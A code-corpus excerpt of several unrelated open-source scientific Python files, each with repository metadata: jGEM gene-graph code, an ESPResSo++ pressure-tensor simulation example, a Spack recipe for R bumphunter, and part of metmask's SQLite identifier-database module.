a = zip(repeat(_worker3), data)
elif version==4:
a = zip(repeat(_worker4), data)
else:
a = zip(repeat(_worker2), data)
genes = reduce(iadd, p.map(worker, a))
p.close()
#p.join()
return genes
def mcore_allcomponents2(sj, me, np=4, depth=500, maxcnt=10000, chroms=None):
return mcore_allcomponents(sj, me, np, 2, depth, maxcnt, chroms)
def mcore_allcomponents3(sj, me, np=4, depth=500, maxcnt=10000, chroms=None):
return mcore_allcomponents(sj, me, np, 3, depth, maxcnt, chroms)
def mcore_allcomponents4(sj, me, filepre, np=4, depth=500, maxcnt=10000, chroms=None):
return mcore_allcomponents(sj, me, np, 4, depth, maxcnt, chroms, filepre)
# GENE FINDER ###############################################################
# def find_genes3(sj, ae, cachename=None, np=1, override=False, depth=140):
# """
# Adds _gidx column to ae
# Connection: by junctions
# Returns genes [set([_id,..]), ...]
# """
# if '_id' not in ae.columns:
# LOG.debug('setting ex _id...')
# UT.set_ids(ae)
# if '_id' not in sj.columns:
# LOG.debug('setting sj _id...')
# UT.set_ids(sj)
# if 'cat' not in ae.columns:
# UT.set_exon_category(sj,ae)
# ### FIND GENES
# if cachename and os.path.exists(cachename) and not override:
# LOG.debug('loading cached genes (connected components)...')
# genes = pickle.load(open(cachename, 'rb'))
# else:
# LOG.debug('finding genes (connected components)...')
# _sttime = time.time()
# me, se = UT.mese(ae)
# genes = mcore_allcomponents3(sj, me, np, depth=depth)
# # genes = [set([_id's]),...]
# # SE genes
# genes += [set([x]) for x in se['_id']]
# if cachename:
# UT.makedirs(os.path.dirname(cachename))
# pickle.dump(genes, open(cachename,'wb'))
# LOG.debug(' time: {0:.3f}s'.format(time.time()-_sttime))
# ### WRITE EXONS W/ GENE number
# LOG.debug('assigning gidx...')
# _sttime = time.time()
# # ae['_gidx'] = 0
# # ae.index = ae['_id']
# # for i, ids in enumerate(genes):
# # ae.ix[ids, '_gidx'] = i+1
# i2g = {}
# for i, ids in enumerate(genes):
# for x in ids:
# i2g[x] = i+1
# ae['_gidx'] = [i2g[x] for x in ae['_id']]
# ## set sj _gidx, use acceptor=>_gidx map (exon a_id, sj a_id)
# a2g = dict(UT.izipcols(ae, ['a_id','_gidx']))
# d2g = dict(UT.izipcols(ae, ['d_id','_gidx']))
# sj['_gidx'] = [a2g.get(x,d2g.get(y,-1)) for x,y in UT.izipcols(sj,['a_id','d_id'])]
# # This shouldn't happen
# nidx = ae['_gidx']==0
# if N.sum(nidx)>0:
# LOG.warning('###### WARNING!!!!!! exons with no gene assignment:{0}'.format(N.sum(nidx)))
# #ae.loc[nidx, '_gidx'] = N.arange(len(ae),len(ae)+N.sum(nidx))
# return genes
def find_genes3(sj, ae, cachename=None, np=1, override=False, depth=500, separatese=True):
"""
Adds _gidx column to ae
Connection: 1) by junctions, 2) by overlap in the same strand
Returns genes [set([_id,..]), ...]
"""
if '_id' not in ae.columns:
LOG.info('setting ex _id...')
UT.set_ids(ae)
if '_id' not in sj.columns:
LOG.info('setting sj _id...')
UT.set_ids(sj)
if 'cat' not in ae.columns:
UT.set_exon_category(sj,ae)
if 'a_id' not in ae.columns:
UT.set_ad_info(sj,ae)
### FIND GENES
if cachename and os.path.exists(cachename) and not override:
LOG.info('loading cached genes (connected components)...')
genes = pickle.load(open(cachename, 'rb'))
else:
LOG.info('finding genes (connected components)...')
_sttime = time.time()
if separatese:
me, se = UT.mese(ae)
genes = mcore_allcomponents3(sj, me, np, depth=depth)
# SE genes
genes += [set([x]) for x in se['_id']]
else:
genes = mcore_allcomponents3(sj, ae, np, depth=depth)
# version 4 graph: uses overlaps in addition to junctions to connect
# genes = [set([_id's]),...]
if cachename:
UT.makedirs(os.path.dirname(cachename))
pickle.dump(genes, open(cachename,'wb'))
LOG.info(' time: {0:.3f}s'.format(time.time()-_sttime))
### WRITE EXONS W/ GENE number
LOG.info('assigning gidx...')
_sttime = time.time()
i2g = {} # eid => _gidx
i2gn = {} # eidt => gname
g2gn = {}
i2s = dict(UT.izipcols(ae, ['_id','strand'])) # eid => strand
#i2c = dict(UT.izipcols(ae, ['_id','cat'])) # eid => category
s2n = {'+':'P','-':'N','.':'','.+':'','.-':''}
c2n = {'s':'S','i':'G','5':'G','3':'G'}
for i, ids in enumerate(genes):
gid = i+1
strand = s2n[i2s[list(ids)[0]]]
cat = 'S' if len(ids)==1 else 'G'
if strand=='N': # negative strand
gid = -gid
gname = 'J{0}{1}{2}'.format(strand,cat,abs(gid))
g2gn[gid] = gname
for x in ids:
i2g[x] = gid
i2gn[x] = gname
ae['_gidx'] = [i2g[x] for x in ae['_id']]
ae['gname'] = [i2gn[x] for x in ae['_id']]
## set sj _gidx, use acceptor=>_gidx map (exon a_id, sj a_id)
a2g = dict(UT.izipcols(ae, ['a_id','_gidx']))
d2g = dict(UT.izipcols(ae, ['d_id','_gidx']))
sj['_gidx'] = [a2g.get(x,d2g.get(y,0)) for x,y in UT.izipcols(sj,['a_id','d_id'])]
sj['gname'] = [g2gn.get(x,'') for x in sj['_gidx']]
# This shouldn't happen
nidx = ae['_gidx']==0
if N.sum(nidx)>0:
LOG.warning('###### WARNING!!!!!! exons with no gene assignment:{0}'.format(N.sum(nidx)))
#ae.loc[nidx, '_gidx'] = N.arange(len(ae),len(ae)+N.sum(nidx))
return genes
def find_genes4(sj, ae, filepre, cachename=None, np=1, override=False, depth=500, separatese=True):
"""
Adds _gidx column to ae
Connection: 1) by junctions, 2) by overlap in the same strand
Returns genes [set([_id,..]), ...]
"""
if '_id' not in ae.columns:
LOG.info('setting ex _id...')
UT.set_ids(ae)
if '_id' not in sj.columns:
LOG.info('setting sj _id...')
UT.set_ids(sj)
if 'cat' not in ae.columns:
UT.set_exon_category(sj,ae)
if 'a_id' not in ae.columns:
UT.set_ad_info(sj,ae)
### FIND GENES
if cachename and os.path.exists(cachename) and not override:
LOG.info('loading cached genes (connected components)...')
genes = pickle.load(open(cachename, 'rb'))
else:
LOG.info('finding genes (connected components)...')
_sttime = time.time()
if separatese:
me, se = UT.mese(ae)
genes = mcore_allcomponents4(sj, me, filepre, np, depth=depth)
# SE genes
genes += [set([x]) for x in se['_id']]
else:
genes = mcore_allcomponents4(sj, ae, filepre, np, depth=depth)
# version 4 graph: uses overlaps in addition to junctions to connect
# genes = [set([_id's]),...]
if cachename:
UT.makedirs(os.path.dirname(cachename))
pickle.dump(genes, open(cachename,'wb'))
LOG.info(' time: {0:.3f}s'.format(time.time()-_sttime))
### WRITE EXONS W/ GENE number
LOG.info('assigning gidx...')
_sttime = time.time()
i2g = {} # eid => _gidx
i2gn = {} # eidt => gname
g2gn = {}
i2s = dict(UT.izipcols(ae, ['_id','strand'])) # eid => strand
#i2c = dict(UT.izipcols(ae, ['_id','cat'])) # eid => category
s2n = {'+':'P','-':'N','.':'','.+':'','.-':''}
c2n = {'s':'S','i':'G','5':'G','3':'G'}
for i, ids in enumerate(genes):
gid = i+1
strand = s2n[i2s[list(ids)[0]]]
cat = 'S' if len(ids)==1 else 'G'
if strand=='N': # negative strand
gid = -gid
gname = 'J{0}{1}{2}'.format(strand,cat,abs(gid))
g2gn[gid] = gname
for x in ids:
i2g[x] = gid
i2gn[x] = gname
ae['_gidx'] = [i2g[x] for x in ae['_id']]
ae['gname'] = [i2gn[x] for x in ae['_id']]
## set sj _gidx, use acceptor=>_gidx map (exon a_id, sj a_id)
a2g = dict(UT.izipcols(ae, ['a_id','_gidx']))
d2g = dict(UT.izipcols(ae, ['d_id','_gidx']))
sj['_gidx'] = [a2g.get(x,d2g.get(y,0)) for x,y in UT.izipcols(sj,['a_id','d_id'])]
sj['gname'] = [g2gn.get(x,'') for x in sj['_gidx']]
# This shouldn't happen
nidx = ae['_gidx']==0
if N.sum(nidx)>0:
LOG.warning('###### WARNING!!!!!! exons with no gene assignment:{0}'.format(N.sum(nidx)))
#ae.loc[nidx, '_gidx'] = N.arange(len(ae),len(ae)+N.sum(nidx))
return genes
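# Illustrative usage sketch (not part of the original module): sj and ae are pandas
# DataFrames of junctions and exons with at least chr/st/ed/strand/name columns;
# the file paths and the filepre prefix below are placeholders.
if __name__ == "__main__":
    sj = UT.read_pandas('sj.txt.gz')   # junction table
    ae = UT.read_pandas('ex.txt.gz')   # exon table
    genes = find_genes4(sj, ae, filepre='tmp/cc.', np=2)
    LOG.info('found {0} connected components (genes)'.format(len(genes)))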
|
kensugino/jGEM
|
jgem/graph.py
|
Python
|
mit
| 24,694
|
[
"VisIt"
] |
935195e66569d28dd37c2981038889fc2d0d2ca1cd8d86b59fcd6a9cdb55e1b1
|
#!/usr/bin/env python2
# Copyright (C) 2015-2017(H)
# Max Planck Institute for Polymer Research
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#####################################################################################################
# #
# ESPResSo++ Python script for a Lennard-Jones standard system including pressure tensor analysis #
# #
#####################################################################################################
import espressopp
import logging
from math import sqrt
system, integrator = espressopp.standard_system.LennardJones(1000, (20,20,20), dt=0.00001, temperature = 1.0)
# logging.getLogger("ExtAnalyze").setLevel(logging.INFO)
print "warming up ..."
capForce = espressopp.integrator.CapForce(system, capForce=10000.0)
integrator.addExtension(capForce)
integrator.run(50000)
capForce.disconnect()
print "equilibrating ..."
integrator.dt=0.005
integrator.run(50000)
PressureTensor = espressopp.analysis.PressureTensor(system)
# interval between measurements
interval = 10
ExtAnalyzePressureTensor = espressopp.integrator.ExtAnalyze(PressureTensor, interval=interval)
integrator.addExtension(ExtAnalyzePressureTensor)
print "starting integration ... measuring pressure tensor every ", interval, " steps"
PressureTensor.reset()
integrator.run(10000)
average_PressureTensor = PressureTensor.getAverageValue()
print "average Pressure Tensor = ", average_PressureTensor[:6]
print " std deviation = ", average_PressureTensor[6:]
print "number of measurements = ", PressureTensor.getNumberOfMeasurements()
|
govarguz/espressopp
|
examples/analyze_during_integration/analyze_during_integration.py
|
Python
|
gpl-3.0
| 2,404
|
[
"ESPResSo"
] |
93119c0160b23f1b023ee8b79edf299d62f8adb8e52e095ce5a1de52bd58e530
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RBumphunter(RPackage):
"""Bump Hunter
Tools for finding bumps in genomic data"""
homepage = "https://bioconductor.org/packages/bumphunter"
git = "https://git.bioconductor.org/packages/bumphunter.git"
version('1.32.0', commit='b7d39c2a6385ca217dceefc918b3ccd5c31bbaa0')
version('1.26.0', commit='606bee8708a0911ced3efb197970b4c9fa52f2fa')
version('1.24.5', commit='29b874033a38e86103b58ef2d4a55f285758147b')
version('1.22.0', commit='fb71b193f4ef7fa12d100441e6eb498765f7afde')
version('1.20.0', commit='c9d8e7ab0c19299988e5d7fa74970312e9a1eac0')
version('1.16.0', commit='1c3ab4d1fd2d75b1586ccef12665960b3602080a')
depends_on('r@2.10:', type=('build', 'run'))
depends_on('r@3.4:', when='@1.20.0:', type=('build', 'run'))
depends_on('r@3.5:', when='@1.24.5:', type=('build', 'run'))
depends_on('r-s4vectors@0.9.25:', type=('build', 'run'))
depends_on('r-iranges@2.3.23:', type=('build', 'run'))
depends_on('r-genomeinfodb', type=('build', 'run'))
depends_on('r-genomicranges', type=('build', 'run'))
depends_on('r-foreach', type=('build', 'run'))
depends_on('r-iterators', type=('build', 'run'))
depends_on('r-locfit', type=('build', 'run'))
depends_on('r-matrixstats', type=('build', 'run'))
depends_on('r-limma', type=('build', 'run'))
depends_on('r-dorng', type=('build', 'run'))
depends_on('r-biocgenerics', type=('build', 'run'))
depends_on('r-genomicfeatures', type=('build', 'run'))
depends_on('r-annotationdbi', type=('build', 'run'))
|
LLNL/spack
|
var/spack/repos/builtin/packages/r-bumphunter/package.py
|
Python
|
lgpl-2.1
| 1,783
|
[
"Bioconductor"
] |
ff08f4770f57a405a15c6d835e7c5f5b56cd4cffda9f2b5973671547b81466fb
|
"""
A module to manage all transactions with the metmask database.
How to use this module
======================
1. Get a connection to your database (just a file location, or possibly
':memory:' if you do not intend to keep the information)
``mm = dbi.db('/home/user/metmask.db')``
2. Insert with `setMask` (see the `mask` module)
3. Query information with the `simpleQuery` interface
4. Close the database either explicitly with `close` or let python
take care of it with just `del mm`
Database tables
===============
- version, the current version number to make sure we do not try
to query an incompatible database
- confidence, holds the confidence codes
- sources, holds the sources codes
- assidx, just an column index (could just as well have been
part of the associations table
- assocaition, holds information about all associations, their
confidence and where they came from
- idtables, a table specifiying which identifier tables the
database currently posses
- _id, basically also just an identifier table but this holds
the master mask identifier
- the rest are tables that holds the identifiers and are named
exactly like the identifier it self
Copyright (C) Henning Redestig
2009
See COPYING.txt for licensing details.
"""
from __future__ import print_function
from __future__ import absolute_import
from builtins import input
from builtins import str
from builtins import map
from builtins import range
from builtins import object
import os
import pdb
import re
import sqlite3
import sys
import metmask
from . import query
from .mask import mask
def determine_path():
"""Borrowed from wxglade.py"""
try:
root = __file__
if os.path.islink(root):
root = os.path.realpath(root)
return os.path.dirname(os.path.abspath(root))
except:
print("I'm sorry, but something is wrong.")
print("There is no __file__ variable. Please contact the author.")
sys.exit()
class recursionError(Exception):
"""this error indicates that when setting a new mask, the program got
stuck in a recursion, attempting to merge too many mask. This
should not happen unless the database is corrupt or the user tries
to set a mask that holds too many common identifiers.
"""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class dbError(Exception):
"""generic database error that wasn't due to syntax problems
"""
def __init__(self, value):
self.value = value
def __str__(self):
return (repr(self.value))
class db(object):
""" The object that should do all transcation to the database. The use
of a single db object for each database ensures that no db-locks
should occur and that connections are not opened and closed too often.
"""
def __init__(self, db, ask=False, debug=True, minoverlap=2):
""" Initialize a `db` object.
Parameters
----------
-`db`, string indicating where the database is or should be
stored. Use ':memory:' to keep everything in the working memory.
- `ask`, logical indicating if the database should expect
feedback from the user or not when deciding how to merge
masks.
        - `debug`, logical for outputting more information.
        - `minoverlap`, integer, the minimum number of tables a new mask
        must share with an existing mask in order to be merged directly.
        """
self.db = db
self.ask = ask
self.debug = debug
self.ifconflict = 'm'
""" `string` indicating the default action when merging (merge, prune) """
self.confidence = {}
""" `dictionary` holding the current known confidence codes and the
indices in the database """
self.idpatterns = {'kegg': '[cCdD]\d{5}$',
'cas': '\d{1,7}-\d{2}-\d{1}$',
'_id': '\d+$',
'synonym': '.+',
'mpimp': '.+',
'riken': '.+',
'cycdb': '.+',
'rlib': '[a-z|A-Z]{0,1}\d{4}',
'kappav': '[kK][pP][cC]\d{5}',
'knapsack': '[cC]\d{8}',
'tsuruoka': '[tT]-\d+$',
'cqid': 'cq_\d{5}$',
'cid': '\d+$',
'chebi': '(CHEBI:){0,1}\d+$',
'default': 'synonym',
'inchi': 'InChI=.+',
'metlin': '\d+$',
'sid': '\d+$',
'hmdb': 'hmdb\d+$',
}
""" dictionary which holds regular expression that
all identifiers for the respective table must match """
self.METMASK_CONF = 0
""" reserved confidence index for internal associations """
self.FORBIDDENTABLENAMES = ['ALL', 'bioconductor', 'all', 'mask', 'graph', 'unknown']
""" reserved strings """
self.METMASK = 'metmask'
self.MAIL = 'metmask-geek@lists.sourceforge.net'
self.METMASKID = 0
""" reserved source string """
self.MIN_OVERLAP = int(minoverlap)
"""`int` the mininum number of tables this mask must match with other
masks in order to merged directly """
self.depth = 0
""" the current level of recursion, used to break a transcation before
recurses too deep """
        self.rw = False
        """ indicates if we have rw access or not """
        self.c = None
if self.db != ':memory:':
if not os.access(self.db, os.F_OK):
try:
open(self.db, 'a').close()
except:
raise dbError('can not create db @ ' + self.db)
if not os.access(self.db, os.R_OK):
raise dbError('can not access db @ ' + self.db)
self.rw = os.access(self.db, os.W_OK)
else:
self.rw = True
self.connection = sqlite3.connect(self.db)
""" `sqlite3.connection` the current connection to the database """
self.connection.text_factory = str
""" see sqlite3 documentation """
self.c = self.connection.cursor()
""" `sqlite3.cursor` the object that can write the db """
if self.debug:
print("#COMMENT Welcome to metmask v" + metmask.__version__)
if not self.getIdTables():
self.setup()
if self.debug:
print("started new database")
else:
# check that we have a legal version (same middle version
# number), other version numbers indicate database
# structural changes
self.c.execute("SELECT number FROM version")
version = self.c.fetchone()[0]
if metmask.__version__.split('.')[1] != version.split('.')[1]:
raise dbError('existing database was created with version ' +
str(version) +
', the database format has changed, re-create '
'the database or use a matching metmask version')
self.updateConfidence()
self.updateIdpatterns()
def __del__(self):
""" commit and close and connection """
try:
self.close()
except sqlite3.ProgrammingError as inst:
if str(inst) != 'Cannot operate on a closed database.':
raise inst
def updateIdpatterns(self):
""" update the patterns dictionary """
self.c.execute("SELECT * FROM idpatterns")
tmp = self.c.fetchall()
for t in tmp:
self.idpatterns[str(t[0])] = t[1]
if self.rw:
self.c.execute("DELETE FROM idpatterns")
for k in list(self.idpatterns.keys()):
self.c.execute("INSERT INTO idpatterns VALUES (?,?)", (k, self.idpatterns[k]))
def updateConfidence(self):
""" update the confidence dictionary with indices and the codes """
self.c.execute("SELECT * FROM confidence")
for co in self.c.fetchall():
self.confidence[str(co[1])] = int(co[0])
def close(self):
""" commit and close the connection """
if self.c:
self.updateForBioC()
self.connection.commit()
self.connection.close()
if self.debug:
print("#COMMENT closed metmask database")
def setup(self):
""" Create the necessary tables for and insert basic information that
must be in all metmask databases.
"""
try:
# misc tables
self.c.execute("CREATE TABLE version (number TEXT)")
self.c.execute("INSERT INTO version VALUES (:num)", {'num': metmask.__version__})
self.c.execute("CREATE TABLE metadata (name TEXT, value TEXT)")
self.c.execute("CREATE TABLE map_counts (map_name TEXT, count INTEGER)")
self.c.execute("CREATE TABLE idpatterns (name TEXT, pattern TEXT)")
self.c.execute("CREATE TABLE assidx (assid INTEGER PRIMARY KEY)")
# confidence
st = "CREATE TABLE confidence ( confid INTEGER PRIMARY KEY, description TEXT UNIQUE )"
self.c.execute(st)
self.c.execute("INSERT INTO confidence VALUES (?, ?)", (self.METMASK_CONF, 'metmask-internal'))
self.c.execute("INSERT INTO confidence VALUES (?, ?)", (metmask.NEVERMERGE_CONF, 'nevermerge'))
self.c.execute("INSERT INTO confidence VALUES (?, ?)", (metmask.WEAK_CONF, 'weak'))
# sources
self.c.execute(
"CREATE TABLE sources ( sourceid INTEGER PRIMARY KEY, name TEXT, master TEXT REFERENCES idtables (name))")
self.c.execute("INSERT INTO sources VALUES (?, ?, ?)", (self.METMASKID, self.METMASK, "_id"))
# standards id tables
self.c.execute(
"CREATE TABLE _id (_id INTEGER PRIMARY KEY, mmid INTEGER, conf INTEGER, src INTEGER, qc INTEGER DEFAULT 0, ass INTEGER DEFAULT 0, UNIQUE (_id, qc))") # mmid is duplicate of _id
self.c.execute(
"CREATE TABLE preferred (_id INTEGER UNIQUE REFERENCES _id (_id), preferred TEXT UNIQUE, conf INTEGER, src INTEGER, qc INTEGER, ass INTEGER DEFAULT 0)")
# idtables
self.c.execute(
"CREATE TABLE idtables ( tableid INTEGER PRIMARY KEY, name TEXT NOT NULL UNIQUE, weak INTEGER DEFAULT 0 )")
self.c.execute("INSERT INTO idtables VALUES (0, \"_id\", 0)")
self.c.execute("INSERT INTO idtables VALUES (1, \"preferred\", 0)")
except sqlite3.OperationalError:
raise dbError("Something went wrong, is the db already initialized?")
def updateForBioC(self):
""" update map_counts and etc so bioconductor is happy
"""
if not self.rw:
return 0
self.c.execute("DELETE FROM map_counts")
tabs = self.getIdTables()
total = 0
for t in tabs:
self.c.execute("SELECT count(*) FROM " + t)
num = self.c.fetchall()[0][0]
total = total + num
self.c.execute("INSERT INTO map_counts VALUES (?,?)", (str(t).upper(), int(num)))
self.c.execute("INSERT INTO map_counts VALUES (?,?)", ("TOTAL", int(total)))
self.c.execute("DELETE FROM metadata")
self.c.execute("INSERT INTO metadata VALUES (?, ?)", (str("DBSCHEMAVERSION"), str("2.0")))
self.c.execute("INSERT INTO metadata VALUES (?, ?)", (str("DBSCHEMA"), str("METMASK_DB")))
self.c.execute("INSERT INTO metadata VALUES (?, ?)", ("METMASK_VERSION", str(metmask.__version__)))
for k in list(self.confidence.keys()):
self.c.execute("INSERT INTO metadata VALUES (?, ?)", ("CONFIDENCE_" + str(k).upper(), self.confidence[k]))
self.c.execute("SELECT * FROM sources")
tmp = self.c.fetchall()
for t in tmp:
self.c.execute("INSERT INTO metadata VALUES (?, ?)", ("SOURCE_" + t[1].upper(), t[0]))
strong = self.getIdTables(weak=False)
for t in tabs:
weak = "WEAK"
if t in strong:
weak = "STRONG"
self.c.execute("INSERT INTO metadata VALUES (?, ?)", (t.upper(), weak))
def createIdTable(self, name, weak=0):
""" Create a new identifier table. No return value.
Parameters:
- `name`: string specifying the name of the identifier.
"""
name = name.rstrip()
if re.match(".*\..*", name):
raise dbError("dot in table name " + name + ". Specify other name")
if name in self.FORBIDDENTABLENAMES:
raise dbError("name of table must not be one of" + str(self.FORBIDDENTABLENAMES))
stTable = "CREATE TABLE " + name + " ( _id INTEGER REFERENCES _id (_id), " + \
name + \
" TEXT, conf INTEGER, src INTEGER, qc INTEGER, ass INTEGER DEFAULT 0, UNIQUE (_id, ass, " + name + "), UNIQUE (" + name + ", qc))"
try:
self.c.execute(stTable)
self.c.execute("CREATE INDEX " + name + "_idx" + " ON " + name + " ( " + name + " )")
self.c.execute("INSERT INTO idtables VALUES (?, ?, ?)", (None, name, weak))
except sqlite3.OperationalError as inst:
if not re.match(".*already exists$", str(inst)):
raise inst
def setTableWeak(self, name):
""" grade an id-table as weak (only relevant for bioconductor)
Parameters:
-`name` : the name of the table
"""
if not name in self.getIdTables():
raise dbError("trying to weaken a non-existent table: " + str(name))
self.c.execute("UPDATE idtables SET weak = 1 WHERE name = :name", {'name': name})
def addAss(self):
""" add an association to the database and get the new association
index back
"""
st = "INSERT INTO assidx VALUES (:ass)"
self.c.execute(st, {'ass': None})
return (self.c.lastrowid)
def addMm(self):
""" add a new mask and get it the index back
"""
self.c.execute("INSERT INTO _id VALUES (?, ?, ?, ?, ?, ?)", (None, 0, self.METMASK_CONF, self.METMASKID, 0, 0))
_id = self.c.lastrowid
self.c.execute("UPDATE _id SET mmid = :_id WHERE _id = :_id", {'_id': _id})
return (_id)
def dropPreferred(self, _id):
""" delete any preferred labels that might be associated with this
mask
Parameters:
- `_id`: the _id
"""
ma = mask({})
ma.append('_id', _id)
existing = self.getMask(ma)
if existing:
if existing[0].hasTable('preferred'):
                prefs = existing[0].getIdentifiers('preferred')
for p in prefs:
self.c.execute('DELETE FROM preferred WHERE _id = :_id', {'_id': _id})
def addConf(self, name):
""" add or fetch a entry from/to the confidence table, get the
created/existing confidence index back
"""
if name in self.confidence:
return (self.confidence[name])
try:
self.c.execute("INSERT INTO confidence VALUES (?, ?)", (None, name))
except sqlite3.IntegrityError as inst:
raise inst
self.updateConfidence()
return (self.addConf(name))
def addSource(self, name, add=True, master='unknown'):
""" add or fetch a entry from/to the sources table, get the
created/existing source index back
"""
if name in self.getIdTables():
raise dbError("source name must not equal a table name")
self.c.execute("SELECT sourceid FROM sources WHERE name = :name", {'name': name})
sourceid = self.c.fetchall()
if sourceid or not add:
return (sourceid[0][0])
else:
self.c.execute("INSERT INTO sources VALUES (?, ?, ?)", (None, name, master))
return (self.c.lastrowid)
def sourceid2master(self, seq):
""" convert a list of source id's to source names
Parameters:
- `seq`, a list of source names
"""
res = []
st = "SELECT master FROM sources WHERE sourceid = ? "
for s in seq:
self.c.execute(st, (s,))
tmp = self.c.fetchall()
for t in tmp:
res = res + [t[0]]
return (res)
def sourceid2source(self, seq):
""" convert a list of source id's to source names
Parameters:
- `seq`, a list of source names
"""
res = []
st = "SELECT name FROM sources WHERE sourceid = ? "
for s in seq:
self.c.execute(st, (s,))
tmp = self.c.fetchall()
for t in tmp:
res = res + [t[0]]
return (res)
def getWeakTables(self):
alltab = self.getIdTables(True)
strong = self.getIdTables(False)
return ([x for x in alltab if x not in strong])
def getIdTables(self, weak=True):
""" get a list with the names of the tables that hold identifiers
Parameters:
-`weak`: fetch weak tables as well
"""
try:
if not weak:
self.c.execute("SELECT name FROM idtables WHERE weak != 1")
else:
self.c.execute("SELECT name FROM idtables")
tables = [x[0] for x in self.c.fetchall()]
return (tables)
except sqlite3.OperationalError as inst:
if re.match('no such table', str(inst)):
return (None)
else:
raise inst
def getMmid(self, un, weak=False, wildcards=False):
""" get the corresponding mmids pointing to anything in this
mask. Return a vector of mmids.
Parameters:
- `un` : a mask
"""
tables = un.getTables()
res = set()
for tab in tables:
st = "SELECT _id FROM " + tab + " WHERE " + tab + "= :identifier"
if wildcards:
st = "SELECT _id FROM " + tab + " WHERE " + tab + " LIKE :identifier"
if not weak:
st = st + " AND conf !=" + str(metmask.WEAK_CONF)
identifiers = un.getIdentifiers(tab, weak=weak)
for ide in identifiers:
try:
self.c.execute(st, {'identifier': ide})
tmp = self.c.fetchall()
if tmp:
for t in tmp:
res.add(t[0])
except sqlite3.OperationalError as inst:
if re.match("no such table", str(inst)):
pass
else:
raise
        # lose the set feature
res = [x for x in res]
return (res)
def getMask(self, un, weak=False, wildcards=False):
""" get all masks that point to anything in the given mask.
Parameters:
- `un`, an instance of `mask.mask`
"""
mmids = self.getMmid(un, weak=weak, wildcards=wildcards)
result = []
tabs = self.getIdTables()
for mm in mmids:
newmask = mask({})
for ta in tabs:
st = "SELECT * FROM " + ta + " WHERE _id = " + str(mm)
if not weak:
st = st + " AND conf != " + str(metmask.WEAK_CONF)
                tmp = None
                try:
                    self.c.execute(st)
                    tmp = self.c.fetchall()
                except sqlite3.OperationalError as inst:
                    if re.match('no such table', str(inst)):
pass
else:
raise inst
if tmp:
for t in tmp:
ide = t[1]
if ta == '_id':
ide = int(ide)
newmask.append(ta, ide, t[2], t[3], t[5])
result.append(newmask)
return (result)
def insertToMask(self, table, _id, value, conf, src, retry=True, nozero=False, ass=0):
""" Insert something to an id-table
Parameters:
-`table`: the table to insert to
-`_id` : the _id (aka mmid)
-`value` : the value to associate _id with (eg cas number)
-`conf` : the confidence code
-`src` : the source code
"""
if table not in self.getIdTables(weak=True):
raise dbError("trying to insert to unknown table: " + str(table))
if table in self.getWeakTables():
conf = metmask.WEAK_CONF
if table == '_id' or table == 'preferred':
conf = self.METMASK_CONF
if conf == metmask.WEAK_CONF or nozero:
self.c.execute("SELECT count(*) FROM " + table)
qc = self.c.fetchall()[0][0] + 1
else:
qc = 0
st = "INSERT INTO " + table + " VALUES (:id, :value, :conf, :src, :qc, :ass)"
try:
self.c.execute(st, {'id': _id, 'value': value, 'conf': conf, 'src': src, 'qc': qc, 'ass': ass})
except sqlite3.IntegrityError as inst:
if re.match("columns.+are not unique", str(inst)):
if retry:
# the ugly hack to allow strong identifier to come from
# several sources
stx = "SELECT DISTINCT _id FROM " + table + " WHERE " + table + " = \"" + value + "\" AND conf !=" + str(
metmask.WEAK_CONF)
self.c.execute(stx)
checkOk = [x[0] == _id for x in self.c.fetchall()]
if all(checkOk):
self.insertToMask(table, _id, value, conf, src, False, True, ass=ass)
else:
pass
def setMask(self, un, resolve=True):
""" Try to input all information in this mask to the database. The db
is first queried for any conflicting masks and the new
information is then either merged to an existing mask or
conflicting information is pruned. See manual.txt for further
clarification of how this is decided.
Parameters:
- `un`: a instance of `mask.mask`
- `resolve`: should conflicts try to be resolved or just over-run with 'merge'
"""
# some globals for this function
mmidsToMerge = []
def panicCheck():
self.depth = self.depth + 1
if self.depth > 100:
return (True)
else:
return (False)
# if you add something, conditions are changed and we might get
        # stuck in a loop where synonym is removed due to conflict then
# re-added here and... unless we only do it once... HACK!
# preferred must also be a strong synonym
if self.depth == 0:
if un.hasTable('preferred'):
mpref = un.getIdentifiers('preferred')[0]
there = False
if un.hasTable('synonym'):
if mpref in un.getIdentifiers('synonym', weak=False):
there = True
if not there:
un.append('synonym', mpref, un.getConfidence('preferred', mpref)[0], \
un.getSource('preferred', mpref)[0])
# ignore pointless masks, (only maps to itself)
# un.show()
# print "-------------------"
# if un.nid() < 2 :
if un.isEmpty():
            self.depth = 0 # no risk to get stuck again
if self.debug:
print("#COMMENT Ignoring pointless mask")
return (0)
# see if we already know something about its content, otherwise
# we get []
_id = self.getMmid(un)
conflict = False
if _id:
conflict = True
if conflict:
# There are mmids that already point to identifiers behind
# this mask, such identifiers are not allowed. solution is
# to either:
#
# - merge the new mask with the existing mask.
#
# - create a new mask but prune away the offending identifiers
# (what we do if there is an error in the input)
#
# get the first conflicting masks
tmpmask = mask({})
tmpmask.append('_id', _id[0])
cnf = self.getMask(tmpmask, weak=True).pop() # get the full mask
if panicCheck():
if self.debug:
pdb.set_trace()
else:
raise recursionError('bogging down..')
# try to figure out what to do with the rest:
if resolve:
possibility = un.resolve(cnf, mm=self)
else:
possibility = 'merge'
if not possibility:
if self.debug:
print("#COMMENT keeping existing mask..", end=' ')
un.subtract(cnf) # subtract non-weak ids
self.setMask(un, resolve)
return (0)
else:
self.ifconflict = possibility[0]
if self.debug:
print("#COMMENT " + str(possibility))
# >>>>Get user decision if asked for
if self.ask:
print("***** conflicting mask *******")
cnf.show(mm=self)
print("***** mask to insert *********")
un.show(mm=self)
print("***** overlap ****************")
intersection = un.intersect(cnf)
intersection.show(mm=self)
print("default:" + possibility)
choice = input("[m]erge/[p]rune and merge : ")
if len(choice) > 0:
self.ifconflict = choice
if self.ifconflict[-1] == '!':
self.ask = False
self.ifconflict = self.ifconflict[0]
# done asking>>>>>>>>>>>>>>>>>>>>>>>
